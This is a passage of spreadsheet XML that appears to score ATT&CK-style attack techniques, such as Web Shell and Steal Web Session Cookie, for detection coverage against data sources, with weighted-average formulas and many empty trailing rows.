        <f>LOOKUP(A239,'REF-DataSources'!A:B)</f>
        <v>Firmware Corruption</v>
      </c>
      <c r="C239" s="45" t="s">
        <v>1735</v>
      </c>
      <c r="D239" s="14">
        <v>0</v>
      </c>
      <c r="E239" s="14">
        <v>1</v>
      </c>
      <c r="F239" s="14">
        <v>4</v>
      </c>
      <c r="G239" s="32">
        <f t="shared" si="3"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="43" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="41" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:B)</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="C240" s="45" t="s">
        <v>1739</v>
      </c>
      <c r="D240" s="14">
        <v>1</v>
      </c>
      <c r="E240" s="14">
        <v>3</v>
      </c>
      <c r="F240" s="14">
        <v>4</v>
      </c>
      <c r="G240" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="43" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="41" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:B)</f>
        <v>Virtualization/Sandbox Evasion</v>
      </c>
      <c r="C241" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D241" s="14">
        <v>0</v>
      </c>
      <c r="E241" s="14">
        <v>2</v>
      </c>
      <c r="F241" s="14">
        <v>4</v>
      </c>
      <c r="G241" s="32">
        <f t="shared" si="3"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="43" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="41" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:B)</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="C242" s="45" t="s">
        <v>1764</v>
      </c>
      <c r="D242" s="14">
        <v>3</v>
      </c>
      <c r="E242" s="14">
        <v>4</v>
      </c>
      <c r="F242" s="14">
        <v>5</v>
      </c>
      <c r="G242" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="43" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="41" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:B)</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="C243" s="45" t="s">
        <v>1778</v>
      </c>
      <c r="D243" s="14">
        <v>3</v>
      </c>
      <c r="E243" s="14">
        <v>4</v>
      </c>
      <c r="F243" s="14">
        <v>5</v>
      </c>
      <c r="G243" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="43" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="41" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C244" s="45" t="s">
        <v>1062</v>
      </c>
      <c r="D244" s="14">
        <v>2</v>
      </c>
      <c r="E244" s="14">
        <v>4</v>
      </c>
      <c r="F244" s="14">
        <v>5</v>
      </c>
      <c r="G244" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="43" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="41" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C245" s="45" t="s">
        <v>1062</v>
      </c>
      <c r="D245" s="14">
        <v>3</v>
      </c>
      <c r="E245" s="14">
        <v>4</v>
      </c>
      <c r="F245" s="14">
        <v>5</v>
      </c>
      <c r="G245" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="B246" s="41" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C246" s="45" t="s">
        <v>3093</v>
      </c>
      <c r="D246" s="14">
        <v>2</v>
      </c>
      <c r="E246" s="14">
        <v>4</v>
      </c>
      <c r="F246" s="14">
        <v>5</v>
      </c>
      <c r="G246" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="B247" s="41" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C247" s="45" t="s">
        <v>3094</v>
      </c>
      <c r="D247" s="14">
        <v>2</v>
      </c>
      <c r="E247" s="14">
        <v>4</v>
      </c>
      <c r="F247" s="14">
        <v>5</v>
      </c>
      <c r="G247" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="B248" s="41" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C248" s="45" t="s">
        <v>3095</v>
      </c>
      <c r="D248" s="14">
        <v>4</v>
      </c>
      <c r="E248" s="14">
        <v>5</v>
      </c>
      <c r="F248" s="14">
        <v>5</v>
      </c>
      <c r="G248" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="B249" s="41" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:B)</f>
        <v>Server Software Component</v>
      </c>
      <c r="C249" s="45" t="s">
        <v>2407</v>
      </c>
      <c r="D249" s="14">
        <v>2</v>
      </c>
      <c r="E249" s="14">
        <v>3</v>
      </c>
      <c r="F249" s="14">
        <v>4</v>
      </c>
      <c r="G249" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="B250" s="41" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:B)</f>
        <v>Web Shell</v>
      </c>
      <c r="C250" s="45" t="s">
        <v>1281</v>
      </c>
      <c r="D250" s="14">
        <v>1</v>
      </c>
      <c r="E250" s="14">
        <v>3</v>
      </c>
      <c r="F250" s="14">
        <v>4</v>
      </c>
      <c r="G250" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="B251" s="41" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:B)</f>
        <v>Web Shell</v>
      </c>
      <c r="C251" s="45" t="s">
        <v>935</v>
      </c>
      <c r="D251" s="14">
        <v>3</v>
      </c>
      <c r="E251" s="14">
        <v>4</v>
      </c>
      <c r="F251" s="14">
        <v>5</v>
      </c>
      <c r="G251" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="B252" s="41" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:B)</f>
        <v>Software Discovery</v>
      </c>
      <c r="C252" s="45" t="s">
        <v>1062</v>
      </c>
      <c r="D252" s="14">
        <v>3</v>
      </c>
      <c r="E252" s="14">
        <v>4</v>
      </c>
      <c r="F252" s="14">
        <v>5</v>
      </c>
      <c r="G252" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="B253" s="41" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:B)</f>
        <v>Security Software Discovery</v>
      </c>
      <c r="C253" s="45" t="s">
        <v>1873</v>
      </c>
      <c r="D253" s="14">
        <v>1</v>
      </c>
      <c r="E253" s="14">
        <v>3</v>
      </c>
      <c r="F253" s="14">
        <v>4</v>
      </c>
      <c r="G253" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="B254" s="41" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:B)</f>
        <v>Security Software Discovery</v>
      </c>
      <c r="C254" s="45" t="s">
        <v>3096</v>
      </c>
      <c r="D254" s="14">
        <v>3</v>
      </c>
      <c r="E254" s="14">
        <v>4</v>
      </c>
      <c r="F254" s="14">
        <v>5</v>
      </c>
      <c r="G254" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="B255" s="41" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:B)</f>
        <v>Implant Container Image</v>
      </c>
      <c r="C255" s="45"/>
      <c r="D255" s="14">
        <v>0</v>
      </c>
      <c r="E255" s="14">
        <v>0</v>
      </c>
      <c r="F255" s="14">
        <v>0</v>
      </c>
      <c r="G255" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="B256" s="41" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:B)</f>
        <v>Cloud Service Discovery</v>
      </c>
      <c r="C256" s="45" t="s">
        <v>1835</v>
      </c>
      <c r="D256" s="14">
        <v>3</v>
      </c>
      <c r="E256" s="14">
        <v>4</v>
      </c>
      <c r="F256" s="14">
        <v>5</v>
      </c>
      <c r="G256" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="B257" s="41" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:B)</f>
        <v>Cloud Service Discovery</v>
      </c>
      <c r="C257" s="45" t="s">
        <v>3097</v>
      </c>
      <c r="D257" s="14">
        <v>3</v>
      </c>
      <c r="E257" s="14">
        <v>4</v>
      </c>
      <c r="F257" s="14">
        <v>5</v>
      </c>
      <c r="G257" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="B258" s="41" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:B)</f>
        <v>Steal Application Access Token</v>
      </c>
      <c r="C258" s="45" t="s">
        <v>1840</v>
      </c>
      <c r="D258" s="14">
        <v>2</v>
      </c>
      <c r="E258" s="14">
        <v>3</v>
      </c>
      <c r="F258" s="14">
        <v>4</v>
      </c>
      <c r="G258" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="B259" s="41" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:B)</f>
        <v>System Shutdown/Reboot</v>
      </c>
      <c r="C259" s="45" t="s">
        <v>985</v>
      </c>
      <c r="D259" s="14">
        <v>5</v>
      </c>
      <c r="E259" s="14">
        <v>5</v>
      </c>
      <c r="F259" s="14">
        <v>5</v>
      </c>
      <c r="G259" s="32">
        <f t="shared" ref="G259:G267" si="4">((D259*2)+(E259*2)+F259)/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="B260" s="41" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:B)</f>
        <v>Data from Cloud Storage Object</v>
      </c>
      <c r="C260" s="45" t="s">
        <v>1848</v>
      </c>
      <c r="D260" s="14">
        <v>2</v>
      </c>
      <c r="E260" s="14">
        <v>3</v>
      </c>
      <c r="F260" s="14">
        <v>4</v>
      </c>
      <c r="G260" s="32">
        <f t="shared" si="4"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="B261" s="41" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:B)</f>
        <v>Account Access Removal</v>
      </c>
      <c r="C261" s="45" t="s">
        <v>985</v>
      </c>
      <c r="D261" s="14">
        <v>3</v>
      </c>
      <c r="E261" s="14">
        <v>4</v>
      </c>
      <c r="F261" s="14">
        <v>5</v>
      </c>
      <c r="G261" s="32">
        <f t="shared" si="4"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="B262" s="41" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:B)</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="C262" s="45" t="s">
        <v>1856</v>
      </c>
      <c r="D262" s="14">
        <v>2</v>
      </c>
      <c r="E262" s="14">
        <v>3</v>
      </c>
      <c r="F262" s="14">
        <v>4</v>
      </c>
      <c r="G262" s="32">
        <f t="shared" si="4"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="B263" s="41" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:B)</f>
        <v>Unused/Unsupported Cloud Regions</v>
      </c>
      <c r="C263" s="45" t="s">
        <v>1848</v>
      </c>
      <c r="D263" s="14">
        <v>3</v>
      </c>
      <c r="E263" s="14">
        <v>5</v>
      </c>
      <c r="F263" s="14">
        <v>5</v>
      </c>
      <c r="G263" s="32">
        <f t="shared" si="4"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="B264" s="41" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:B)</f>
        <v>Unused/Unsupported Cloud Regions</v>
      </c>
      <c r="C264" s="45" t="s">
        <v>3098</v>
      </c>
      <c r="D264" s="14">
        <v>4</v>
      </c>
      <c r="E264" s="14">
        <v>5</v>
      </c>
      <c r="F264" s="14">
        <v>5</v>
      </c>
      <c r="G264" s="32">
        <f t="shared" si="4"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="B265" s="41" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:B)</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="C265" s="45" t="s">
        <v>1848</v>
      </c>
      <c r="D265" s="14">
        <v>3</v>
      </c>
      <c r="E265" s="14">
        <v>4</v>
      </c>
      <c r="F265" s="14">
        <v>5</v>
      </c>
      <c r="G265" s="32">
        <f t="shared" si="4"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="B266" s="41" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:B)</f>
        <v>Cloud Service Dashboard</v>
      </c>
      <c r="C266" s="45" t="s">
        <v>1868</v>
      </c>
      <c r="D266" s="14">
        <v>3</v>
      </c>
      <c r="E266" s="14">
        <v>4</v>
      </c>
      <c r="F266" s="14">
        <v>5</v>
      </c>
      <c r="G266" s="32">
        <f t="shared" si="4"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="B267" s="41" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:B)</f>
        <v>Steal Web Session Cookie</v>
      </c>
      <c r="C267" s="45" t="s">
        <v>1873</v>
      </c>
      <c r="D267" s="14">
        <v>2</v>
      </c>
      <c r="E267" s="14">
        <v>3</v>
      </c>
      <c r="F267" s="14">
        <v>4</v>
      </c>
      <c r="G267" s="32">
        <f t="shared" si="4"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="268" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D268" s="14"/>
      <c r="E268" s="14"/>
      <c r="F268" s="14"/>
      <c r="G268" s="15"/>
    </row>
    <row r="269" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D269" s="14"/>
      <c r="E269" s="14"/>
      <c r="F269" s="14"/>
      <c r="G269" s="15"/>
    </row>
    <row r="270" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D270" s="14"/>
      <c r="E270" s="14"/>
      <c r="F270" s="14"/>
      <c r="G270" s="15"/>
    </row>
    <row r="271" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D271" s="14"/>
      <c r="E271" s="14"/>
      <c r="F271" s="14"/>
      <c r="G271" s="15"/>
    </row>
    <row r="272" spans="1:7" x14ac:dyDescent="0.2">
      <c r="D272" s="14"/>
      <c r="E272" s="14"/>
      <c r="F272" s="14"/>
      <c r="G272" s="15"/>
    </row>
    <row r="273" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D273" s="14"/>
      <c r="E273" s="14"/>
      <c r="F273" s="14"/>
      <c r="G273" s="15"/>
    </row>
    <row r="274" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D274" s="14"/>
      <c r="E274" s="14"/>
      <c r="F274" s="14"/>
      <c r="G274" s="15"/>
    </row>
    <row r="275" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D275" s="14"/>
      <c r="E275" s="14"/>
      <c r="F275" s="14"/>
      <c r="G275" s="15"/>
    </row>
    <row r="276" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D276" s="14"/>
      <c r="E276" s="14"/>
      <c r="F276" s="14"/>
      <c r="G276" s="15"/>
    </row>
    <row r="277" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D277" s="14"/>
      <c r="E277" s="14"/>
      <c r="F277" s="14"/>
      <c r="G277" s="15"/>
    </row>
    <row r="278" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D278" s="14"/>
      <c r="E278" s="14"/>
      <c r="F278" s="14"/>
      <c r="G278" s="15"/>
    </row>
    <row r="279" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D279" s="14"/>
      <c r="E279" s="14"/>
      <c r="F279" s="14"/>
      <c r="G279" s="15"/>
    </row>
    <row r="280" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D280" s="14"/>
      <c r="E280" s="14"/>
      <c r="F280" s="14"/>
      <c r="G280" s="15"/>
    </row>
    <row r="281" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D281" s="14"/>
      <c r="E281" s="14"/>
      <c r="F281" s="14"/>
      <c r="G281" s="15"/>
    </row>
    <row r="282" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D282" s="14"/>
      <c r="E282" s="14"/>
      <c r="F282" s="14"/>
      <c r="G282" s="15"/>
    </row>
    <row r="283" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D283" s="14"/>
      <c r="E283" s="14"/>
      <c r="F283" s="14"/>
      <c r="G283" s="15"/>
    </row>
    <row r="284" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D284" s="14"/>
      <c r="E284" s="14"/>
      <c r="F284" s="14"/>
      <c r="G284" s="15"/>
    </row>
    <row r="285" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D285" s="14"/>
      <c r="E285" s="14"/>
      <c r="F285" s="14"/>
      <c r="G285" s="15"/>
    </row>
    <row r="286" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D286" s="14"/>
      <c r="E286" s="14"/>
      <c r="F286" s="14"/>
      <c r="G286" s="15"/>
    </row>
    <row r="287" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D287" s="14"/>
      <c r="E287" s="14"/>
      <c r="F287" s="14"/>
      <c r="G287" s="15"/>
    </row>
    <row r="288" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D288" s="14"/>
      <c r="E288" s="14"/>
      <c r="F288" s="14"/>
      <c r="G288" s="15"/>
    </row>
    <row r="289" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D289" s="14"/>
      <c r="E289" s="14"/>
      <c r="F289" s="14"/>
      <c r="G289" s="15"/>
    </row>
    <row r="290" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D290" s="14"/>
      <c r="E290" s="14"/>
      <c r="F290" s="14"/>
      <c r="G290" s="15"/>
    </row>
    <row r="291" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D291" s="14"/>
      <c r="E291" s="14"/>
      <c r="F291" s="14"/>
      <c r="G291" s="15"/>
    </row>
    <row r="292" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D292" s="14"/>
      <c r="E292" s="14"/>
      <c r="F292" s="14"/>
      <c r="G292" s="15"/>
    </row>
    <row r="293" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D293" s="14"/>
      <c r="E293" s="14"/>
      <c r="F293" s="14"/>
      <c r="G293" s="15"/>
    </row>
    <row r="294" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D294" s="14"/>
      <c r="E294" s="14"/>
      <c r="F294" s="14"/>
      <c r="G294" s="15"/>
    </row>
    <row r="295" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D295" s="14"/>
      <c r="E295" s="14"/>
      <c r="F295" s="14"/>
      <c r="G295" s="15"/>
    </row>
    <row r="296" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D296" s="14"/>
      <c r="E296" s="14"/>
      <c r="F296" s="14"/>
      <c r="G296" s="15"/>
    </row>
    <row r="297" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D297" s="14"/>
      <c r="E297" s="14"/>
      <c r="F297" s="14"/>
      <c r="G297" s="15"/>
    </row>
    <row r="298" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D298" s="14"/>
      <c r="E298" s="14"/>
      <c r="F298" s="14"/>
      <c r="G298" s="15"/>
    </row>
    <row r="299" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D299" s="14"/>
      <c r="E299" s="14"/>
      <c r="F299" s="14"/>
      <c r="G299" s="15"/>
    </row>
    <row r="300" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D300" s="14"/>
      <c r="E300" s="14"/>
      <c r="F300" s="14"/>
      <c r="G300" s="15"/>
    </row>
    <row r="301" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D301" s="14"/>
      <c r="E301" s="14"/>
      <c r="F301" s="14"/>
      <c r="G301" s="15"/>
    </row>
    <row r="302" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D302" s="14"/>
      <c r="E302" s="14"/>
      <c r="F302" s="14"/>
      <c r="G302" s="15"/>
    </row>
    <row r="303" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D303" s="14"/>
      <c r="E303" s="14"/>
      <c r="F303" s="14"/>
      <c r="G303" s="15"/>
    </row>
    <row r="304" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D304" s="14"/>
      <c r="E304" s="14"/>
      <c r="F304" s="14"/>
      <c r="G304" s="15"/>
    </row>
    <row r="305" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D305" s="14"/>
      <c r="E305" s="14"/>
      <c r="F305" s="14"/>
      <c r="G305" s="15"/>
    </row>
    <row r="306" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D306" s="14"/>
      <c r="E306" s="14"/>
      <c r="F306" s="14"/>
      <c r="G306" s="15"/>
    </row>
    <row r="307" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D307" s="14"/>
      <c r="E307" s="14"/>
      <c r="F307" s="14"/>
      <c r="G307" s="15"/>
    </row>
    <row r="308" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D308" s="14"/>
      <c r="E308" s="14"/>
      <c r="F308" s="14"/>
      <c r="G308" s="15"/>
    </row>
    <row r="309" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D309" s="14"/>
      <c r="E309" s="14"/>
      <c r="F309" s="14"/>
      <c r="G309" s="15"/>
    </row>
    <row r="310" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D310" s="14"/>
      <c r="E310" s="14"/>
      <c r="F310" s="14"/>
      <c r="G310" s="15"/>
    </row>
    <row r="311" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D311" s="14"/>
      <c r="E311" s="14"/>
      <c r="F311" s="14"/>
      <c r="G311" s="15"/>
    </row>
    <row r="312" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D312" s="14"/>
      <c r="E312" s="14"/>
      <c r="F312" s="14"/>
      <c r="G312" s="15"/>
    </row>
    <row r="313" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D313" s="14"/>
      <c r="E313" s="14"/>
      <c r="F313" s="14"/>
      <c r="G313" s="15"/>
    </row>
    <row r="314" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D314" s="14"/>
      <c r="E314" s="14"/>
      <c r="F314" s="14"/>
      <c r="G314" s="15"/>
    </row>
    <row r="315" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D315" s="14"/>
      <c r="E315" s="14"/>
      <c r="F315" s="14"/>
      <c r="G315" s="15"/>
    </row>
    <row r="316" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D316" s="14"/>
      <c r="E316" s="14"/>
      <c r="F316" s="14"/>
      <c r="G316" s="15"/>
    </row>
    <row r="317" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D317" s="14"/>
      <c r="E317" s="14"/>
      <c r="F317" s="14"/>
      <c r="G317" s="15"/>
    </row>
    <row r="318" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D318" s="14"/>
      <c r="E318" s="14"/>
      <c r="F318" s="14"/>
      <c r="G318" s="15"/>
    </row>
    <row r="319" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D319" s="14"/>
      <c r="E319" s="14"/>
      <c r="F319" s="14"/>
      <c r="G319" s="15"/>
    </row>
    <row r="320" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D320" s="14"/>
      <c r="E320" s="14"/>
      <c r="F320" s="14"/>
      <c r="G320" s="15"/>
    </row>
    <row r="321" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D321" s="14"/>
      <c r="E321" s="14"/>
      <c r="F321" s="14"/>
      <c r="G321" s="15"/>
    </row>
    <row r="322" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D322" s="14"/>
      <c r="E322" s="14"/>
      <c r="F322" s="14"/>
      <c r="G322" s="15"/>
    </row>
    <row r="323" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D323" s="14"/>
      <c r="E323" s="14"/>
      <c r="F323" s="14"/>
      <c r="G323" s="15"/>
    </row>
    <row r="324" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D324" s="14"/>
      <c r="E324" s="14"/>
      <c r="F324" s="14"/>
      <c r="G324" s="15"/>
    </row>
    <row r="325" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D325" s="14"/>
      <c r="E325" s="14"/>
      <c r="F325" s="14"/>
      <c r="G325" s="15"/>
    </row>
    <row r="326" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D326" s="14"/>
      <c r="E326" s="14"/>
      <c r="F326" s="14"/>
      <c r="G326" s="15"/>
    </row>
    <row r="327" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D327" s="14"/>
      <c r="E327" s="14"/>
      <c r="F327" s="14"/>
      <c r="G327" s="15"/>
    </row>
    <row r="328" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D328" s="14"/>
      <c r="E328" s="14"/>
      <c r="F328" s="14"/>
      <c r="G328" s="15"/>
    </row>
    <row r="329" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D329" s="14"/>
      <c r="E329" s="14"/>
      <c r="F329" s="14"/>
      <c r="G329" s="15"/>
    </row>
    <row r="330" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D330" s="14"/>
      <c r="E330" s="14"/>
      <c r="F330" s="14"/>
      <c r="G330" s="15"/>
    </row>
    <row r="331" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D331" s="14"/>
      <c r="E331" s="14"/>
      <c r="F331" s="14"/>
      <c r="G331" s="15"/>
    </row>
    <row r="332" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D332" s="14"/>
      <c r="E332" s="14"/>
      <c r="F332" s="14"/>
      <c r="G332" s="15"/>
    </row>
    <row r="333" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D333" s="14"/>
      <c r="E333" s="14"/>
      <c r="F333" s="14"/>
      <c r="G333" s="15"/>
    </row>
    <row r="334" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D334" s="14"/>
      <c r="E334" s="14"/>
      <c r="F334" s="14"/>
      <c r="G334" s="15"/>
    </row>
    <row r="335" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D335" s="14"/>
      <c r="E335" s="14"/>
      <c r="F335" s="14"/>
      <c r="G335" s="15"/>
    </row>
    <row r="336" spans="4:7" x14ac:dyDescent="0.2">
      <c r="D336" s="14"/>
      <c r="E336" s="14"/>
